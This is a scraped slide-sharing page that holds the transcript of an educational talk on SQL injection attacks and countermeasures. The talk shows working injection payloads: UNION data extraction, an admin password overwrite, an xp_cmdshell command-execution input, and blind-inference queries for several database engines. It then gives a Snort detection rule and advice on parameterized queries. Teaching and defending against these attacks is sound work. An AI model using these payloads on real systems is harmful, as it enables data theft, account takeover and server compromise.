Cade zvavanjanja saigf cybercrime &amp; security onlineCade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security onlineCade Zvavanjanja
 
Cade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade Zvavanjanja
 
Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cade Zvavanjanja
 
A case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaA case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaCade Zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Cade Zvavanjanja
 
Cloud computing & service level agreements
Cloud computing & service level agreementsCloud computing & service level agreements
Cloud computing & service level agreementsCade Zvavanjanja
 
Introduction to IT Security
Introduction to IT SecurityIntroduction to IT Security
Introduction to IT SecurityCade Zvavanjanja
 
Gainful Information Security 2012 services
Gainful Information Security 2012 servicesGainful Information Security 2012 services
Gainful Information Security 2012 servicesCade Zvavanjanja
 

Plus de Cade Zvavanjanja (10)

Cade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security onlineCade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security online
 
Cade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf online
 
comesa cybersecurity
comesa cybersecuritycomesa cybersecurity
comesa cybersecurity
 
Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1
 
A case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaA case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
 
Cloud computing & service level agreements
Cloud computing & service level agreementsCloud computing & service level agreements
Cloud computing & service level agreements
 
Introduction to IT Security
Introduction to IT SecurityIntroduction to IT Security
Introduction to IT Security
 
Gainful Information Security 2012 services
Gainful Information Security 2012 servicesGainful Information Security 2012 services
Gainful Information Security 2012 services
 
Top online frauds 2010
Top online frauds 2010Top online frauds 2010
Top online frauds 2010
 

Dernier

Top 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTop 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTopCSSGallery
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxjbellis
 
Using IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandUsing IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandIES VE
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxFIDO Alliance
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfFIDO Alliance
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch TuesdayIvanti
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdfMuhammad Subhan
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform EngineeringMarcus Vechiato
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGDSC PJATK
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!Memoori
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераMark Opanasiuk
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxTales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxFIDO Alliance
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...FIDO Alliance
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Skynet Technologies
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfSrushith Repakula
 

Dernier (20)

Top 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTop 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development Companies
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptx
 
Using IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandUsing IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & Ireland
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptx
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch Tuesday
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform Engineering
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxTales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
 
Overview of Hyperledger Foundation
Overview of Hyperledger FoundationOverview of Hyperledger Foundation
Overview of Hyperledger Foundation
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 

Web application attacks using Sql injection and countermasures

  • 1. SQL INJECTION ATTACKS Cade Zvavanjanja CISO Gainful Information Security Introduction Background Techniques Prevention Demo Conclusions Questions
  • 2. OUTLINE  Background of SQL Injection  Techniques and Examples  Preventing SQL Injection  Demo  Wrap-Up  Questions Introduction Background Techniques Prevention Demo Conclusions Questions
  • 3. BACKGROUND OF SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 4. DATABASES: WHERE ARE THEY NOW? Fat Server Fat Client Fat Server & Fat Client Mainframes X Desktop Apps X Web Apps X Introduction Background Techniques Prevention Demo Conclusions Questions
  • 5. WHY IS SQL A STANDARD? Relational Database Platform Runtime Loose Interpretation Independence Semantics Introduction Background Techniques Prevention Demo Conclusions Questions
  • 6. FLEXIBILITY = VULNERABILITY  Simple Injection  Decoding Error Messages  Blind Injection  Encoding Exploits  Stored Procedures ---  Programmer Error (Faulty Logic) Introduction Background Techniques Prevention Demo Conclusions Questions
  • 7. SQL Injection Techniques Introduction Background Techniques Prevention Demo Conclusions Questions
  • 8. IMPORTANT SYMBOLS ‘  “Hack” --  “Comment Out” ;  “End Statement” %,*  “Wildcards”
  • 9. SQL INJECTION DEFINITION The input field is modified in such a way that the Database returns unintended data. Sql: SELECT <column name> FROM <Table name> WHERE <logic expression>
  • 10. EXAMPLE: DATABASE SCHEMA  Table Users  Has columns “username” and “password”  Accessed when users log in  Table Customers  Has column “phone”  Users can look up other customer phone numbers by name  Application does no input validation Introduction Background Techniques Prevention Demo Conclusions Questions
  • 11. RETURNING EXTRA ROWS WITH “UNION”  Query: SELECT phone FROM Customers WHERE last_name = ‘<name>’  Input: x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x Introduction Background Techniques Prevention Demo Conclusions Questions
  • 12. MODIFYING RECORDS  Application has password changing page  SQL: UPDATE users SET password = ‘<newpassword>’ WHERE username = ‘<username>’  Input: newpassword’ WHERE username LIKE ‘%admin%’ -- Introduction Background Techniques Prevention Demo Conclusions Questions
  • 13. MS SQL SERVER  Default SQL Server setup  Defaultsystem admin account “sa” enabled  No password!!!  Supports multiple queries  “Extended stored procedures”: C/C++ DLL files  Read/writeexternal files  Access command line Introduction Background Techniques Prevention Demo Conclusions Questions
  • 14. EXPLOITING SQL SERVER  Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘<name>’  Input: '; exec master..xp_cmdshell 'iisreset'; -- Introduction Background Techniques Prevention Demo Conclusions Questions
  • 15. DATA-MINING WITH SQL INJECTION  Three classes of data-mining  In-band  Out-of-band  Inference
  • 16. IN-BAND ATTACKS  Data is included in response from the web server  Could be a well rendered web page  Using UNION SELECTS  Error messages
  • 17. OUT-OF-BAND ATTACKS  Data is retrieved using another communication channel:  UTL_HTTP.REQUEST  OPENROWSET  XP_SENDMAIL
  • 18. INFERENCE ATTACKS  At the core of inference is a question  Action taken based upon the answer  Chris Anley’s time delay: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
  • 19. INFERENCE ATTACKS…CONT:  Examples:  Time Delay  Generate 200/500 responses  Response Variation  Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
  • 20. INFERENCE ATTACKS…CONT:  CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
  • 21. INFERENCE THROUGH WEB SERVER RESPONSE CODES  Need query that will compile fine but generate error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
  • 22. INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:  Notes:  Works well with SQL Server, Oracle, DB2  MySQL returns NULL  Informix ODBC driver returns 200 – even in event of error  Response code could be 302 Redirect, etc – principle is the same.  Leaves a large number of 500 response in log files  App Environments like PL/SQL will return 404 instead of 500
  • 23. INFERENCE THROUGH RESPONSE VARIATIONS:  Parameter Splitting and Balancing  Avoids 500 responses
  • 24. PARAMETER SPLITTING AND BALANCING  ‘NGSSOFTWARE’  ‘NGSSOFTWA’+’RE’  ‘NGSSOFTWA’||’RE’  ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’  ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’  2 1 +1  1 + (SUBSELECT RETURNS 1)
  • 25. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS  Cold Fusion Management  Converts “ to &quot;  Converts & to &amp;  Converts > to &gt;  Converts < to &lt;  Doubles up single quotes  Usually means attack vector is numeric input  PHP often doubles single quote – magic quotes
  • 26. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS… CONT:  Rather than > use BETWEEN X AND Y  Rather than & use ^ A xor BIT = C  if C is greater than A then Bit is not set  If C is less than A then Bit is set  Rather than ‘A’ use CHR(65)/CHAR(65)
  • 27. INFERENCE QUERIES…  SQL Server – String data ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub- query),the_byte,1)) then char(known_value) else char(1/0) end) + '
  • 28. INFERENCE QUERIES…  Oracle – Numeric + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
  • 29. INFERENCE QUERIES…  Oracle – String data '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
  • 30. INFERENCE QUERIES…  MySQL – Numeric + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end (uses page response variation)
  • 31. INFERENCE QUERIES…  MySQL – String Data ' + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘ (one returns no recordset – the other returns all rows)
  • 32. INFERENCE QUERIES…  Informix – Numeric + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
  • 33. INFERENCE QUERIES…  Informix – String data ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
  • 34. PREVENTING SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 35. PREVENTING SQL INJECTION Input Validation Input Checking Functions Access Rights User Permissions Variable Placeholders Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
  • 36. INPUT VALIDATION  Checks  Type  Size  Format  Range  Replace quotation marks “All input is wrong and dangerous” Introduction Background Techniques Prevention Demo Conclusions Questions
  • 37. INPUT CHECKING FUNCTIONS  Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”; $sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’] ); $result = mysql_query($sql); Introduction Background Techniques Prevention Demo Conclusions Questions
  • 38. ACCESS RIGHTS Web User vs. System Administrator – ‘sa’ Introduction Background Techniques Prevention Demo Conclusions Questions
  • 39. USER PERMISSIONS  Limit query access rights  SELECT  UPDATE  DROP  Restricted statement access  Global-specific  Database-specific  Table-specific Introduction Background Techniques Prevention Demo Conclusions Questions
  • 40. VARIABLE PLACEHOLDERS (?)  Defense from String Concatenation  Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); Introduction Background Techniques Prevention Demo Conclusions Questions
  • 41. STORED PROCEDURES  Use error checking variables  Buffer direct database access Introduction Background Techniques Prevention Demo Conclusions Questions
  • 42. DEMONSTRATION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 43. COUNTERMEASURES  System Administrators  White List / Blacklist Input Validation  Least Privileges  Application firewalls  Developer  StoredProcedures  Parameterized queries  Exception handling
  • 44. WHITELIST INPUT VALIDATION  UrlScan v3.0  restricts the types of HTTP requests that IIS will process [SQL Injection Headers] AppliesTo=.asp,.aspx [SQL Injection Headers Strings] -- @ ; also catches @@ alter delete drop exec insert alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;  SNORT uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i";  Create rule to check for SQL attack classtype:Web-application-attack; sid:9099; rev:5;)
  • 45. LEAST PRIVILEGES  Enforce least privileges  CREATE / DELETE  Does not guarantee security  Access to portion of data  Create views
  • 46. CONCLUSIONS  SQL Injection continues to evolve with new technologies  Dangerous Effects  Access to critical information  Updating data not meant to be updated  Exploiting DBMS to directly affect the server and its resources  Prevention of SQL Injection  Input Validation and Query Building  Permissions and Access Rights  Variable Placeholders (Prepare) and Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
  • 47. QUESTIONS  1) What could prevent the ‘Students’ table from being dropped?  2) What is another way to prevent Injection? Introduction Background Techniques Prevention Demo Conclusions Questions
  • 48. REFERENCES  Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php- center.de/en-html-manual/security.database.sql- injection.html>.  Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.  "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.  Finnigan, Pete. " SQL Injection and Oracle, Part One ." SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.  Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection- Attacks-Are-You-Safe/2/>. Introduction Background Techniques Prevention Demo Conclusions Questions
  • 49. Thank You Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117 Eml: info@gis.co.zw cade@gis.co.zw Web: www.gis.co.zw Introduction Background Techniques Prevention Demo Conclusions Questions

Notes de l'éditeur

  1. RFID virus uses MS SQL Server commands.
  2. PHP example
  3. May remove this slide
  4. http://sacs.ucf.edu/ccr/cct_welcome.asp
  5. What is WhiteList/Blacklist input validation - explain Choose whitelist over black list it much easier to accept valid states than it is to denythem
  6. This will not prevent SQL injection attack but it will minimize it. Create/Delete – you application will most likely never have to create and drop tables at runtime Elevation of privileges Views should only access data that is required for the application